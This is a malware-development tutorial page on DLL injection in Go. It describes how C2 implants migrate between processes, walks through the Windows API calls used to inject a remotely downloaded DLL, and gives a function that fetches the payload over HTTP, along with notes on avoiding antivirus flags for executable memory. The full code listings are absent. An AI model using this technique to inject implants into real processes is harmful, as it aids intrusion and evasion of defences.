1. Dll Injection
#processinjection #dllinjection #golang #maldev #malwaredevelopment
A fairly common technique when it comes code injection is dll injection. All major c2 frameworks are using this technique when a command such as migrate is used. When a c2 migrates from one process to another, although it's seamless to the operator, it usually injects the implant dll into the remote process and kills the current implant session.
In this post we will explore how we can inject a dll to a remote process.
The following steps will be performed in the following code:
CreateRemoteThread
Let's dive into the code:
Download dll from a remote host
It is fairly easy to issue a get request and download the remote file into a byte slice in golang. The following function was used.
func wget(url string) ([]byte, error) {
resp, err := http.Get(url)
if err != nil {
return []byte{}, err
}
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
return []byte{}, err
}
return body, nil
}
the wget function receives the URL as an argument and returns the byte slice if successful or an error if it fails
This is how the code is called from the main function:
Write it to disk (current working directory)
This technique will not reflectively load the dll. The dll will be written to disk first and then it will be loaded the remote process.
The dll will be stored in the current working directory
fnameBytes turns the path string to a byte slice
OpenProcess
To get a handle on the remote process the OpenProcess winapi will be used.
dwDesiredAccess: This is defined by the rest of the APIs that we will use.
VirtualAllocEX -> PROCESS_VM_OPERATION
WriteProcessMemory -> PROCESS_VM_WRITE and PROCESS_VM_OPERATION
CreateRemoteThread -> PROCESS_CREATE_THREAD, PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION, PROCESS_VM_WRITE, and PROCESS_VM_READ
Alternatively we can use PROCESS_ALL_ACCESS for convenience
More information on process security and access rights
bInheritHandle: Will be set to false
dwProcessId: Will be the ID of the process to get a handle on
Luckily the OpenProcess API is part of the windows package
Allocating memory on remote process
VirtuallAllocEx will be used for allocating memory for the dll path in the remote memory.
hProcess: Process Handle returned by the OpenProcess API
lpAddress: We will let the API decide where to allocate the memory, therefore this value will be set to 0
dwSize: Will be the size of our shellcode
flAllocationType: We need to reserve and commit memory
flProtect: This can be done in a number of ways. To write and execute shellcode we will need rwx permissions. It is however unusual for legitimate programs to allocate memory with rwx permissions and it is usually flagged my AV engines. Another option is to assign rx or rw and then change permissions as needed for writing and executing with VirtualProtectEx or WriteProcessMemory.
Writing dll path to remote process
WriteProcessMemory winapi will be used to write the dll path to the remote memory
hProcess: Process Handle returned by the OpenProcess API
lpBaseAddress: Value returned from VirtualAllocEx
lpBuffer: A pointer to the beginning of our shellcode byte array
nSize: Size of our shellcode
lpNumberOfBytesWritten: Ouputs the number of bytes written to the destination address
line 5: Pass the dll path byte slice
Get the address LoadLibraryA
Create Remote Thread
CreateRemoteThread API will be used to create a thread and run the shellcode.
Only three parameters will be used and the rest will be set to null
hProcess: Process Handle returned by the OpenProcess API
lpStartAddress: The address of LoadLibraryA will be passed
lpParameter: LoadLibraryA only accepts one parameter so we pass the address returned by VirtualAllocEx where the path of the dll resides
lpThreadId: Returns the newly created threadID
DLL Code
Complete Code
Last updated
Was this helpful?